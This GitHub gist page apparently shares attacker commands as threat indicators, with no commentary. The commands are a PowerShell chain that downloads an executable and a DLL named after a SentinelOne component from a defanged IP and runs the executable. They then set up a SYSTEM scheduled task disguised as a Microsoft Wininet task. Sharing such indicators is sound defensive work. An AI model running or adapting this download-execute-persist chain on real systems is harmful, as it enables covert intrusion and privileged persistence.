Skip to content

Instantly share code, notes, and snippets.

@Purp1eW0lf
Created February 23, 2024 16:21
Show Gist options
  • Save Purp1eW0lf/048e4b13cdd9d503884d473da4eb6f09 to your computer and use it in GitHub Desktop.
Save Purp1eW0lf/048e4b13cdd9d503884d473da4eb6f09 to your computer and use it in GitHub Desktop.
powershell wget -uri http://185[.]232[.]92[.]32:8888/SentinelUI.exe -OutFile C:\\Windows\\Help\\Help\\SentinelUI.exe;
wget -uri http://185[.]232[.]92[.]32:8888/Logs.txt -OutFile C:\\Windows\\Help\\Help\\Logs.txt;
wget -uri http://185[.]232[.]92[.]32:8888/SentinelAgentCore.dll -OutFile C:\\Windows\\Help\\Help\\SentinelAgentCore.dll;
cmd /c C:\\Windows\\Help\\Help\\SentinelUI.exe;
SCHTASKS /Create /TN \\Microsoft\\Windows\\Wininet\\UserCache_1708535250863 /TR \"C:\\Windows\\Help\\Help\\SentinelUI.exe\" /RU SYSTEM /SC ONSTART /RL HIGHEST /NP /F /DELAY 0000:05
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment